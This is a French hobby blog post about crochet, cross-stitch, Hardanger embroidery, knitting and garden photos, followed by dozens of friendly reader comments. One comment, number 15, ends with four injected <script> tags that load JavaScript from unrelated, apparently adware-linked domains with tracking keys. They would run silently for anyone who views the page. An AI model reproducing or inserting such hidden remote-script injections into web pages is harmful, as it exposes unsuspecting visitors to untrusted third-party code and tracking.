• Un peu de tout

     

      

    Bonjour mes amies (s) ,,, 

    Voici depuis mon précédent article mes réalisations encours ou mes ouvrages terminés  

    Tout d'abord cette boule de Noël au crochet 

     

     J'ai commencé à broder sur un torchon 

    le grand ABC de Noël 

    de chez les brodeuses parisiennes ,,, 

     

    et

    je continue à broder séparément cet ABC

     

    Il a fait beau la semaine dernière 

    et

    j'ai brodé à l'extérieur 

    un peu de Hardanger cela change ,,, 

    petit à petit ce centre de table avance ,,, 

    abandonné dans mon tiroir à encours ,,, je suis contente de reprendre cet ouvrage ,,, 

    point d'edelweiss  

    Pivoine et ciboulette 

     Je continue le tricot ,,, 

    Un châle

     

     

    Une graine a germé 

    une pensée 

     ne pouvant aller au cimetière dû au confinement 

    une pensée pour nos disparues(s)

     

    j'ai refait un masque ,,, 

     

    dans le bouleau les tourterelles ont fait leur nid

     

    et

    ma Finette sur la pelouse 

     

    Plantation de géranium ,,, 

    Finette aime ce mettre sous cette chaise sur la terre ,,, 

     J'ai terminé pour aujourd'hui 

    Je vous souhaite une douce et belle journée ,,, 

    Merci pour vos commentaires et votre fidélité

    je vous souhaite une douce journée,,, bisous bisous,,, 

    la mure brode

    "Joyeux Printemps" - Plaque fleurie avec oiseaux...

     

    « broderie crochettricot châle ,,, boules de Noël ,,, coeur brodé »

  • Commentaires

    61
    Vendredi 22 Mai 2020 à 13:23

    Bonjour Murielle.

    Fin de la  semaine ,avec du beau soleil. 

    J'espère et souhaite qu'il en soit de même pour toi .

    Bonne et agréable journée .

    Bon weekend .@ lundi .

    Bisous. kettyn.

     

    60
    Lundi 18 Mai 2020 à 12:23

    De très belles réalisations, très variées.

    Un coup de coeur pour ta broderie hardanger !

    A bientôt.

    59
    Dimanche 17 Mai 2020 à 12:01

    Que de belles créations et en-cours, j'admire comme toujours ! Bon dimanche =^..^=

    58
    Samedi 16 Mai 2020 à 12:16

    Ces photos respirent des instants de bonheur, des petits moments tous doux où il fait bon te ressourcer après des journées de travail bien remplies. Les encours on les laisse pour quelques temps, puis on y reviens avant de passer à d'autres projets qui trottinent dans la tête. J'admire ta boule de Noël au crochet et tes broderies. Très jolie ta broderie hardanger, le point d'edelweiss tiens je ne le connaissais pas celui là!  Elle a raison la Finette au jardin il fait bon vivre, et restons sous la chaise dès fois que le ciel nous tombe sur la tête...Bonne et douce fin de semaine.Bisous. Edelweiss

    57
    Samedi 16 Mai 2020 à 11:27

    Bonjour Murielle

    Me revoilà ,absente depuis un moment .

    Mon P C a rendue l’âme en début du confinement ,donc j'ai dut attendre .

    Je fais escale chez toi

    Je viens voir comment tu vas

    J'en profite pour te souhaiter

    Une très bonne journée en ce beau weekend

    J’espère que tu vas bien !

    Bisous ma douce .kettyn.

    56
    Vendredi 15 Mai 2020 à 21:14

    Bonsoir, de magnifiques réalisations !!!! j'aime beaucoup ta boule de Noël;

    câlin à Finette;

    bisous

    55
    Jeudi 14 Mai 2020 à 06:51

    De très belles réalisations avec une préférence pour celles qui tournent autour de Noël!

    54
    Mercredi 13 Mai 2020 à 15:34

    oh tout est très joli et délicat une fois de plus................ bravo! la boule en crochet m'épate, quelle légèreté...

    53
    Lundi 11 Mai 2020 à 12:04

    Coucou Murielle, quel magnifique article coloré , tes ouvrages sont tous magnifiques, j'adore la laine du châle, le petit cœur brodé, le joli masque fleuri, tes magnifiques pivoines, sans oublier bien sûr la magnifique Finette

    je te souhaite une bonne semaine, bisous

    52
    MMT
    Lundi 11 Mai 2020 à 10:11

    que de jolies choses tu nous fais voir

    je me demande comment tu arrives à faire toutes ces objets ??

    et tes photos superbes , les tourterelles 

    ici on a une pie qui vient béquer dans la fenêtre 

    mais pas de photos , elle est trop subtile 

    bonne journée à toi bisous 

    51
    Lundi 11 Mai 2020 à 10:10

    Merci pour toutes ces belles photos.
    J'adore ta boule de noël, tes nouveaux ouvrages sont superbes.
    J'adore les modèles des Brodeuses Parisiennes.
    Ton tricot est tout simplement whaouuuuuu.
    Quant à ton jardin, il donne envie de s'y prélasser.
    Gros bisous et belle journée à toi

    Prends biens soin de toi surtout.

    50
    Dimanche 10 Mai 2020 à 18:43

    plein de très jolies photos

    quelle finesse tes créations bravo à toi

    très bon dimanche

    49
    Dimanche 10 Mai 2020 à 12:34

    Coucou ma Mûre C est toujours un plaisir de voir tes réalisations au fil de toutes les aiguilles que tu utilises avec succés.

    De tes boules au crochet à ton châle aux coloris estivaux, en passant par ce joli torchon de Noël que j'ai hâte de voir terminé, tout est pur bonheur.

    Bonne continuation et courage pour le boulot, en plus du reste ....

    Gros bisous

    48
    Dimanche 10 Mai 2020 à 08:04
    Claudie

    tu es toujours aussi active, que de merveilles! J'aime beaucoup ta boule de Noël, c'est superbe. Et ta laine a vraiment de belles couleurs chatoyantes.. quant aux photos de ton jardin (et de Finette), c'est toujours un régal. Bon dimanche, bisous

    47
    Samedi 9 Mai 2020 à 19:12

    Un peu de tout oui, mais tout est bien en même temps

    46
    Vendredi 8 Mai 2020 à 21:37

    Je suis impressionnée! Tu es très douée en hardanger! Bisous

    45
    Vendredi 8 Mai 2020 à 12:57

    Encore de jolies réalisations et de belles photos.

    C'est toujours un émerveillement lorsque je passe par ici.

    Bonne continuation

    44
    Vendredi 8 Mai 2020 à 10:24
    Brunella

    Que choisir tout est superbe !!! 

    Je vois que tu as de la compagnie :)...

    Idem j'ai encore fait des masques mais pour le bien de nous tous...

    Très joli billet ma belle..

    Douce journée..

    Des bisous

    43
    Vendredi 8 Mai 2020 à 10:21

    Que de beaux ouvrages . Quel travail minutieux que l' Hardanger  je suis admirative.

     De bien jolies fleurs . 

    Et Melle Finette toujours prête pour la pose photos!!!!

    Douce Journée.

    Bisous 

    42
    Vendredi 8 Mai 2020 à 06:54

    Toujours de belles et bonnes occupations,  superbe hardanger , mais c'est si reposant

    l faut bien essayer de penser à autre chose en ces temps , le jardin nous offre ses couleurs

    Passes une bonne fin de semaine, bisous

    41
    Jeudi 7 Mai 2020 à 23:11
    Toujours de belles creations. Bravo. Belle soiree. Celine
    40
    Jeudi 7 Mai 2020 à 21:32

    Encore de bien jolis ouvrages , j'adore la couleur de ton tricot ! Finette est toujours aussi craquante .

    39
    noune
    Jeudi 7 Mai 2020 à 16:30

    bonjour. j'adore ta broderie hardanger et la couleur du tricot superbe. 

    des fleurs, des fleurs, j'adore les fleurs.

    merci

    38
    Jeudi 7 Mai 2020 à 15:50

    coucou lamure, il est bien beau ton jardin entre les fleurs les oiseaux et finette, chaque chose est a sa place , tout pour que tu sois bien quand tu brodes ou tricote, tes ouvrages sont splendides, ce hardanger , pouah j'admire , trop beau ce point d'edelweiss! bonne continuation ma belle, gros bisous de ma belle ensoleillée Charente, profites ça va durer on a un weekend pourri en vu!

    37
    Jeudi 7 Mai 2020 à 15:40

    Bravo pour les belles photos et tes réalisations broderie, crochet et hardanger

    36
    Jeudi 7 Mai 2020 à 11:58

    Que de superbes créations toujours très en finesse La Mure

    Chance d'avoir un nid de tourterelles, bientôt les petits

    Bien à l'abri ta belle Finette sous cette chaise

    Passe une agréable journée

    Gros bisous

    Plein de doux câlins à ton adorable boule de poils

     

    35
    Jeudi 7 Mai 2020 à 11:37

    toujours aussi jolies tes réalisations, le torchon promet d'être somptueux ! bises

    34
    Jeudi 7 Mai 2020 à 11:14
    Agnes87

    De très belles réalisations encore une fois.

    j’aime beaucoup ton centre de table, évidemment il y a du rose 
    J’essaie de me corriger mais chasser le naturel il revient au galop

    33
    Jeudi 7 Mai 2020 à 09:50

    Coucou Murielle,

    Je suis admirative devant tant de beautés que tu nous présentes aujourd'hui. Ton torchon va être splendide, je n'aurai pas pensé broder tous ces motifs sur un torchon.  La boule au crochet est magnifique.  Le centre de taille : une pure merveille.  Je connais un peu le Hardanger mais je suis loin d'en être arrivée à ce stade. Pourtant j'ai beaucoup de livres sur cette broderie que j'adore.  Le châle va être très joli aussi.  Bref, tout est splendide même les jolies photos des fleurs du jardins  et autres.  Bravo bravo.....   Je te souhaite une agréable journée pleine de douceur.  Prends bien soin de toi aussi et de tes proches.  Bisous. 

    32
    Jeudi 7 Mai 2020 à 09:36

    Un billet comme tu sais si bien les faire avec de la variété et toujours de si jolies photos! Que ce soit du crochet des petites croix du hardanger   du tricot et e la couture rien ne te fait peur et tu es douée dans chaque "discipline" merci pour ces photos de fleurs!

     gros câlins à Finette et gros bisous à toi

     bonne semaine et bon courage pour ton boulot merci à toi de ce que tu fais pour les autres! bisous bisous

    31
    Mercredi 6 Mai 2020 à 21:22

    Oh la la, je suis verte de jalousie devant ta broderie Hardanger, trop, trop belle !

    Je n'ai pas de raison d'être  jalouse puisque je ne pratique pas la broderie mais non, là vraiment, c'est tellement beau... ça fait rêver !

    Une nouvelle fois un très bel article dans lequel je suis contente de retrouver, comme toujours, ta Finette qui est bien heureuse car elle n'est pas comme Téléa, confiné dans l'appart'... C'est sur qu'elle a une plus belle vie.

    Gros bisous

     

     

    30
    Mercredi 6 Mai 2020 à 19:34

    ravissante production !!

    Tes pivoines sont plus en avance que chez moi : pas encor' en boutons  aww

    Bisous Muriel et prends soin de Toi 

    29
    Mercredi 6 Mai 2020 à 18:57

    comme toujours, tu fais des merveilles -
    J'adore ton hardanger sorti du placard - il est superbe - j'adore j'adore
    calins à la belle Finette - gros bizou et belle soirée bizou

    28
    Mercredi 6 Mai 2020 à 18:08

    que de beaux encours bises

    27
    Lillyden
    Mercredi 6 Mai 2020 à 18:00
    Bonjour.tant de jolies choses tu fais. Il me manque le temps pour en faire autant. Bonne fin de journée
    26
    Mercredi 6 Mai 2020 à 16:41

    De très jolis ouvrages, j'aime beaucoup le début de ton torchon, et ton hardanger j'adore les couleurs ♥ Bonne continuation

    Du bonheur au jardin, trop bien le nid des tourterelles ♥

    Bisous et douce fin de journée

    25
    Mercredi 6 Mai 2020 à 16:22

    Quelle production !!

    Les edelweiss sont magnifiques

    Belle journée

    24
    Mercredi 6 Mai 2020 à 15:56

    Coucou Murielle,

    Oh c'est magnifique tout ce que tu as réalisé !

    J'adore tout ! Très jolis les petits motifs au point de croix pour Noël ! Superbe la boule au crochet avec les perles et le ruban !

    Ton centre de table hardanger sera de toute beauté ainsi que ton châle !

    Ton jardin a l'air aussi très bien arrangé !

    Et Finette est toujours aussi mignonne !

    Caresses pour elle et gros bisous pour toi

    23
    Mercredi 6 Mai 2020 à 15:55

    Ton sapin va être magnifique avec toutes ces jolies boules ! 

    Il est superbe ton hardanger et j'aime les couleurs . De jolies réalisations en cours et terminées .

    Mes petites tourterelles ont fait leur nid dans le sapin il y a quelques années et tous les ans il y a des petits ,

    dommage ils sont cachés dans les branches , le boulot est plus clair on les voit mieux .

    Finette profite du jardin tranquillement .

    Bisous bisous

    22
    Mercredi 6 Mai 2020 à 15:25

    bonjour la Mure , je t'ai mis un com hier soir !  et plouf plus d'article  ?  hi  hi   

    oui,  alors je te disais que tes broderies on les aime +++ tous les deux !

    de très belles pivoines !! eh oui les masques ! il faut en faire pour soi  ,  car dur dur pour en avoir ? 

    et ça devient du commerce !!!  ?   ,   et Finette si belle  plein de caresses pour elle 

    gros bisous belle semaine A +  protègez vous bien !!!!   ...

    amicalement

    21
    Mercredi 6 Mai 2020 à 13:47

    Bravo tout est si beaux 

    tu as des doigts de fée 

    ça sent presque l'été  chez toi 

    bises et bonne journée 

    20
    Mercredi 6 Mai 2020 à 11:43

    Bonjour La mûre, du crochet, de la broderie et du tricot, tes petits doigts sont toujours en action.

    Tout est magnifique. Bravo à toi.

    La nature est au rendez vous avec les fleurs, les oiseaux et la belle et adorable finette.

    Plein de caresses à elle.

    Je te souhaite de passer une bonne semaine.

    Bisous

    19
    Mercredi 6 Mai 2020 à 10:58

    Quel talent, une artiste, "beaucoup de cordes à ton arc" j'admire le hardanger, avec la couleur nuancée... et l'abc de Noël tout en finesse.

    De jolies fleurs, et une Finette qui se met au chaud, et au sec pour faire sa sieste.

    Douce journée

    18
    Mercredi 6 Mai 2020 à 10:17

    comme toujours tout est magnifique. J'adore ton point edelweiss sur le hardanger. Il est super bien réussi. Bisous

    17
    Mercredi 6 Mai 2020 à 09:39
    Quel magnifique billet...Je suis sous le charme de...tout, j'aurait bien du mal à choisir. Bises
    16
    Patricia Lecomte
    Mercredi 6 Mai 2020 à 09:27
    Bonjour Murielle
    Comme d habitude c est magnifique...quel plaisir de vous lire de voir vos beaux ouvrages et les belles photos..merci merci..portez vous bien.Bisous
    15
    Mercredi 6 Mai 2020 à 09:23

    Coucou ma tite Mure ,

    que de merveilles terminées ou en cours !

    J'adore cette broderie Hardanger , avec ces superbes couleurs !

    Toujours aussi belle ta Finette !

    Bonne et belle journée ,

    gros bisous

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1588749604288" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    14
    Mercredi 6 Mai 2020 à 09:08

    Que de belles choses réalisées. Tes broderies Hardanger m'épatent, quel exercice de jolies broderies. Tu es très habile de tes mains et ce que tu réalises est toujours beau et de qualité. Bonne continuation.

    13
    marie jeann85
    Mercredi 6 Mai 2020 à 09:05

    Merci à toi de prendre du temps pour faire un article 

    Quel bonheur de découvrir ton travail artistique d'une si grande qualité 

    Tes jolies fleurs qui nous donnent du rêve 

    Finesse toujours aussi adorable 

    Et toute cette nature 

    Je t'embrasse affectueusement

    12
    Mercredi 6 Mai 2020 à 08:44

    coucou La Mûre

    Que de belles fleurs !

    Tu as bien travaillé et très joliment

    Belle fin de semaine

    BIZZZ

    11
    Mercredi 6 Mai 2020 à 08:33

    Tes aiguilles à broder, ton crochet et tes aiguilles à tricoter ce sont bien activées ces dernières semaines.

    J'adore ton ouvrage hardanger, il est superbe.

    Belle journée, bisous et caresses à demoiselle Finette.

    10
    Mercredi 6 Mai 2020 à 08:30

    ... tu es une vraie "touche à tout"!

    Quelle finesse dans tes broderies, tu m'épates..

    Finette est bien tranquille, la sérénité même.

    Bises du  jour

    Mireille du sablon

    9
    Mercredi 6 Mai 2020 à 08:26

    Tu t'es défoncée !

    Bisous

    8
    Mercredi 6 Mai 2020 à 08:17

    une belle production de broderie, crochet, tricot et merci pour les jolies fleurs de ton jardin et le mignon petit chat - bisouset bonne journée.

    7
    Mercredi 6 Mai 2020 à 07:26

     

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

    bravo pour tes belles avancéesj'adore  ton  centre de tablepasse une belle journéebises

    6
    Mercredi 6 Mai 2020 à 07:21

    Superbe ton billet 

    Tu oeuvres merveilleusement 

    J'aime beaucoup cette suspension "boule'" 

    J'entends d'ici le ronronement yes

    Chat tranquille 

    Brabo pour le tout 

    Bisous

    ***

    Mosaïque de la semaine dernière 

    Mercredi 6 mai 2020

    5
    Maya
    Mercredi 6 Mai 2020 à 07:14
    Superbe !! Tu sais tout faire hihi .. bravoo bisou
    4
    Mardi 5 Mai 2020 à 17:57

    Belles réalisations. Je n'ai encore pas tenté le hardanger mais j'aime bien cette broderie. Je devrais essayer. J'ai le même tissu que tu as utilisé pour ton masque. Quelle chance , d'observer les tourterelles au nid. Finette trouve toujours des endroits où elle est tranquille. Bonne journée, bises

    3
    Mardi 5 Mai 2020 à 17:57
    CathyRose

    Et bien tu n'arrêtes pas, entre le crochet et la broderie !
    L'ABC de Noël promet d'être très joli, hâte de voir la suite.
    La broderie Hardanger je trouve ça vraiment très joli.
    J'ai la même pivoine mais presque défleurie, elle n'a pas aimé la pluie de ces derniers jours ...
    Oh bientôt des bébés tourterelle alors, chouette !
    Quant à ta Finette elle est très sérieuse, des caresses à elle !
    Bel après-midi, bisous !
    Cathy

    2
    Mardi 5 Mai 2020 à 17:54

    Bonjour Murielle c'est un régal de venir chez toi,

    on y trouve  que de superbes réalisations.....

    C'est très diversifié

    Bravo à toi... toujours aussi belle ta Finette tu lui fera une caresse de ma part

    Je te souhaite une belle fin de journée

    Bisous de Pat

    1
    AA
    Mardi 5 Mai 2020 à 17:49

    Ton hardanger est magnifique, très jolie couleur.

    bonne fin de journée

    AA

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :